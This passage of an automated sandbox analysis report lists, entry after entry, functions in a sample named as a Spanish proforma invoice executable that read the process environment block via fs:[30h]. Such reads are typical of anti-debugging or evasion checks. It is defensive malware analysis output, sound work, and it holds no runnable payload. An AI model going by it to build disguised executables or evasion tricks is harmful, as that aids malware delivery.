              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3680B55F mov eax, dword ptr fs:[00000030h]2_2_3680B55F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36762594 mov eax, dword ptr fs:[00000030h]2_2_36762594
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367BC592 mov eax, dword ptr fs:[00000030h]2_2_367BC592
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367D7591 mov edi, dword ptr fs:[00000030h]2_2_367D7591
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE588 mov eax, dword ptr fs:[00000030h]2_2_367AE588
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE588 mov eax, dword ptr fs:[00000030h]2_2_367AE588
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676A580 mov eax, dword ptr fs:[00000030h]2_2_3676A580
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676A580 mov eax, dword ptr fs:[00000030h]2_2_3676A580
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36769580 mov eax, dword ptr fs:[00000030h]2_2_36769580
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36769580 mov eax, dword ptr fs:[00000030h]2_2_36769580
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EF582 mov eax, dword ptr fs:[00000030h]2_2_367EF582
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B273 mov eax, dword ptr fs:[00000030h]2_2_3672B273
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B273 mov eax, dword ptr fs:[00000030h]2_2_3672B273
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672B273 mov eax, dword ptr fs:[00000030h]2_2_3672B273
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C327E mov eax, dword ptr fs:[00000030h]2_2_367C327E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C327E mov eax, dword ptr fs:[00000030h]2_2_367C327E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C327E mov eax, dword ptr fs:[00000030h]2_2_367C327E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C327E mov eax, dword ptr fs:[00000030h]2_2_367C327E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C327E mov eax, dword ptr fs:[00000030h]2_2_367C327E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367C327E mov eax, dword ptr fs:[00000030h]2_2_367C327E
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367ED270 mov eax, dword ptr fs:[00000030h]2_2_367ED270
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AD250 mov eax, dword ptr fs:[00000030h]2_2_367AD250
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AD250 mov ecx, dword ptr fs:[00000030h]2_2_367AD250
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F124C mov eax, dword ptr fs:[00000030h]2_2_367F124C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F124C mov eax, dword ptr fs:[00000030h]2_2_367F124C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F124C mov eax, dword ptr fs:[00000030h]2_2_367F124C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F124C mov eax, dword ptr fs:[00000030h]2_2_367F124C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EF247 mov eax, dword ptr fs:[00000030h]2_2_367EF247
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3680B2BC mov eax, dword ptr fs:[00000030h]2_2_3680B2BC
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3680B2BC mov eax, dword ptr fs:[00000030h]2_2_3680B2BC
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3680B2BC mov eax, dword ptr fs:[00000030h]2_2_3680B2BC
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3680B2BC mov eax, dword ptr fs:[00000030h]2_2_3680B2BC
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675F24A mov eax, dword ptr fs:[00000030h]2_2_3675F24A
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36750230 mov ecx, dword ptr fs:[00000030h]2_2_36750230
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_368032C9 mov eax, dword ptr fs:[00000030h]2_2_368032C9
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B0227 mov eax, dword ptr fs:[00000030h]2_2_367B0227
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B0227 mov eax, dword ptr fs:[00000030h]2_2_367B0227
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B0227 mov eax, dword ptr fs:[00000030h]2_2_367B0227
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676A22B mov eax, dword ptr fs:[00000030h]2_2_3676A22B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676A22B mov eax, dword ptr fs:[00000030h]2_2_3676A22B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676A22B mov eax, dword ptr fs:[00000030h]2_2_3676A22B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672821B mov eax, dword ptr fs:[00000030h]2_2_3672821B
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367BB214 mov eax, dword ptr fs:[00000030h]2_2_367BB214
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367BB214 mov eax, dword ptr fs:[00000030h]2_2_367BB214
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672A200 mov eax, dword ptr fs:[00000030h]2_2_3672A200
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367402F9 mov eax, dword ptr fs:[00000030h]2_2_367402F9
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367402F9 mov eax, dword ptr fs:[00000030h]2_2_367402F9
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367402F9 mov eax, dword ptr fs:[00000030h]2_2_367402F9
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367402F9 mov eax, dword ptr fs:[00000030h]2_2_367402F9
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367402F9 mov eax, dword ptr fs:[00000030h]2_2_367402F9
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367402F9 mov eax, dword ptr fs:[00000030h]2_2_367402F9
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367402F9 mov eax, dword ptr fs:[00000030h]2_2_367402F9
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367402F9 mov eax, dword ptr fs:[00000030h]2_2_367402F9
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367272E0 mov eax, dword ptr fs:[00000030h]2_2_367272E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673A2E0 mov eax, dword ptr fs:[00000030h]2_2_3673A2E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673A2E0 mov eax, dword ptr fs:[00000030h]2_2_3673A2E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673A2E0 mov eax, dword ptr fs:[00000030h]2_2_3673A2E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673A2E0 mov eax, dword ptr fs:[00000030h]2_2_3673A2E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673A2E0 mov eax, dword ptr fs:[00000030h]2_2_3673A2E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673A2E0 mov eax, dword ptr fs:[00000030h]2_2_3673A2E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367382E0 mov eax, dword ptr fs:[00000030h]2_2_367382E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367382E0 mov eax, dword ptr fs:[00000030h]2_2_367382E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367382E0 mov eax, dword ptr fs:[00000030h]2_2_367382E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367382E0 mov eax, dword ptr fs:[00000030h]2_2_367382E0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672D2EC mov eax, dword ptr fs:[00000030h]2_2_3672D2EC
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672D2EC mov eax, dword ptr fs:[00000030h]2_2_3672D2EC
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367532C5 mov eax, dword ptr fs:[00000030h]2_2_367532C5
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672C2B0 mov ecx, dword ptr fs:[00000030h]2_2_3672C2B0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EF2AE mov eax, dword ptr fs:[00000030h]2_2_367EF2AE
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367F92AB mov eax, dword ptr fs:[00000030h]2_2_367F92AB
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367542AF mov eax, dword ptr fs:[00000030h]2_2_367542AF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367542AF mov eax, dword ptr fs:[00000030h]2_2_367542AF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367292AF mov eax, dword ptr fs:[00000030h]2_2_367292AF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36737290 mov eax, dword ptr fs:[00000030h]2_2_36737290
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36737290 mov eax, dword ptr fs:[00000030h]2_2_36737290
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36737290 mov eax, dword ptr fs:[00000030h]2_2_36737290
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE289 mov eax, dword ptr fs:[00000030h]2_2_367AE289
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE372 mov eax, dword ptr fs:[00000030h]2_2_367AE372
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE372 mov eax, dword ptr fs:[00000030h]2_2_367AE372
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE372 mov eax, dword ptr fs:[00000030h]2_2_367AE372
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AE372 mov eax, dword ptr fs:[00000030h]2_2_367AE372
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B0371 mov eax, dword ptr fs:[00000030h]2_2_367B0371
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B0371 mov eax, dword ptr fs:[00000030h]2_2_367B0371
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675237A mov eax, dword ptr fs:[00000030h]2_2_3675237A
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673B360 mov eax, dword ptr fs:[00000030h]2_2_3673B360
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673B360 mov eax, dword ptr fs:[00000030h]2_2_3673B360
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673B360 mov eax, dword ptr fs:[00000030h]2_2_3673B360
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673B360 mov eax, dword ptr fs:[00000030h]2_2_3673B360
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673B360 mov eax, dword ptr fs:[00000030h]2_2_3673B360
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3673B360 mov eax, dword ptr fs:[00000030h]2_2_3673B360
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676E363 mov eax, dword ptr fs:[00000030h]2_2_3676E363
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676E363 mov eax, dword ptr fs:[00000030h]2_2_3676E363
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676E363 mov eax, dword ptr fs:[00000030h]2_2_3676E363
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676E363 mov eax, dword ptr fs:[00000030h]2_2_3676E363
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676E363 mov eax, dword ptr fs:[00000030h]2_2_3676E363
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676E363 mov eax, dword ptr fs:[00000030h]2_2_3676E363
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676E363 mov eax, dword ptr fs:[00000030h]2_2_3676E363
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676E363 mov eax, dword ptr fs:[00000030h]2_2_3676E363
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676A350 mov eax, dword ptr fs:[00000030h]2_2_3676A350
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36728347 mov eax, dword ptr fs:[00000030h]2_2_36728347
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36728347 mov eax, dword ptr fs:[00000030h]2_2_36728347
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36728347 mov eax, dword ptr fs:[00000030h]2_2_36728347
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36768322 mov eax, dword ptr fs:[00000030h]2_2_36768322
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36768322 mov eax, dword ptr fs:[00000030h]2_2_36768322
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36768322 mov eax, dword ptr fs:[00000030h]2_2_36768322
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675332D mov eax, dword ptr fs:[00000030h]2_2_3675332D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672E328 mov eax, dword ptr fs:[00000030h]2_2_3672E328
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672E328 mov eax, dword ptr fs:[00000030h]2_2_3672E328
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672E328 mov eax, dword ptr fs:[00000030h]2_2_3672E328
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674E310 mov eax, dword ptr fs:[00000030h]2_2_3674E310
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674E310 mov eax, dword ptr fs:[00000030h]2_2_3674E310
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674E310 mov eax, dword ptr fs:[00000030h]2_2_3674E310
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676631F mov eax, dword ptr fs:[00000030h]2_2_3676631F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36729303 mov eax, dword ptr fs:[00000030h]2_2_36729303
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36729303 mov eax, dword ptr fs:[00000030h]2_2_36729303
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EF30A mov eax, dword ptr fs:[00000030h]2_2_367EF30A
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B330C mov eax, dword ptr fs:[00000030h]2_2_367B330C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B330C mov eax, dword ptr fs:[00000030h]2_2_367B330C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B330C mov eax, dword ptr fs:[00000030h]2_2_367B330C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B330C mov eax, dword ptr fs:[00000030h]2_2_367B330C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367633D0 mov eax, dword ptr fs:[00000030h]2_2_367633D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367643D0 mov ecx, dword ptr fs:[00000030h]2_2_367643D0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367B43D5 mov eax, dword ptr fs:[00000030h]2_2_367B43D5
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672E3C0 mov eax, dword ptr fs:[00000030h]2_2_3672E3C0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672E3C0 mov eax, dword ptr fs:[00000030h]2_2_3672E3C0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672E3C0 mov eax, dword ptr fs:[00000030h]2_2_3672E3C0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672C3C7 mov eax, dword ptr fs:[00000030h]2_2_3672C3C7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36803336 mov eax, dword ptr fs:[00000030h]2_2_36803336
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367363CB mov eax, dword ptr fs:[00000030h]2_2_367363CB
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367AC3B0 mov eax, dword ptr fs:[00000030h]2_2_367AC3B0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367393A6 mov eax, dword ptr fs:[00000030h]2_2_367393A6
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367393A6 mov eax, dword ptr fs:[00000030h]2_2_367393A6
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675A390 mov eax, dword ptr fs:[00000030h]2_2_3675A390
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675A390 mov eax, dword ptr fs:[00000030h]2_2_3675A390
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3675A390 mov eax, dword ptr fs:[00000030h]2_2_3675A390
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36731380 mov eax, dword ptr fs:[00000030h]2_2_36731380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36731380 mov eax, dword ptr fs:[00000030h]2_2_36731380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36731380 mov eax, dword ptr fs:[00000030h]2_2_36731380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36731380 mov eax, dword ptr fs:[00000030h]2_2_36731380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36731380 mov eax, dword ptr fs:[00000030h]2_2_36731380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674F380 mov eax, dword ptr fs:[00000030h]2_2_3674F380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674F380 mov eax, dword ptr fs:[00000030h]2_2_3674F380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674F380 mov eax, dword ptr fs:[00000030h]2_2_3674F380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674F380 mov eax, dword ptr fs:[00000030h]2_2_3674F380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674F380 mov eax, dword ptr fs:[00000030h]2_2_3674F380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3674F380 mov eax, dword ptr fs:[00000030h]2_2_3674F380
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367EF38A mov eax, dword ptr fs:[00000030h]2_2_367EF38A
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36804080 mov eax, dword ptr fs:[00000030h]2_2_36804080
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36804080 mov eax, dword ptr fs:[00000030h]2_2_36804080
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36804080 mov eax, dword ptr fs:[00000030h]2_2_36804080
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36804080 mov eax, dword ptr fs:[00000030h]2_2_36804080
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36804080 mov eax, dword ptr fs:[00000030h]2_2_36804080
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36804080 mov eax, dword ptr fs:[00000030h]2_2_36804080
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36804080 mov eax, dword ptr fs:[00000030h]2_2_36804080
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36737072 mov eax, dword ptr fs:[00000030h]2_2_36737072
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36736074 mov eax, dword ptr fs:[00000030h]2_2_36736074
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36736074 mov eax, dword ptr fs:[00000030h]2_2_36736074
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367D9060 mov eax, dword ptr fs:[00000030h]2_2_367D9060
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36731051 mov eax, dword ptr fs:[00000030h]2_2_36731051
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36731051 mov eax, dword ptr fs:[00000030h]2_2_36731051
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36760044 mov eax, dword ptr fs:[00000030h]2_2_36760044
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_368050B7 mov eax, dword ptr fs:[00000030h]2_2_368050B7
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672D02D mov eax, dword ptr fs:[00000030h]2_2_3672D02D
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36772010 mov ecx, dword ptr fs:[00000030h]2_2_36772010
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36755004 mov eax, dword ptr fs:[00000030h]2_2_36755004
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36755004 mov ecx, dword ptr fs:[00000030h]2_2_36755004
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36738009 mov eax, dword ptr fs:[00000030h]2_2_36738009
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3672C0F6 mov eax, dword ptr fs:[00000030h]2_2_3672C0F6
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676D0F0 mov eax, dword ptr fs:[00000030h]2_2_3676D0F0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3676D0F0 mov ecx, dword ptr fs:[00000030h]2_2_3676D0F0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367290F8 mov eax, dword ptr fs:[00000030h]2_2_367290F8
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367290F8 mov eax, dword ptr fs:[00000030h]2_2_367290F8
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367290F8 mov eax, dword ptr fs:[00000030h]2_2_367290F8
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367290F8 mov eax, dword ptr fs:[00000030h]2_2_367290F8
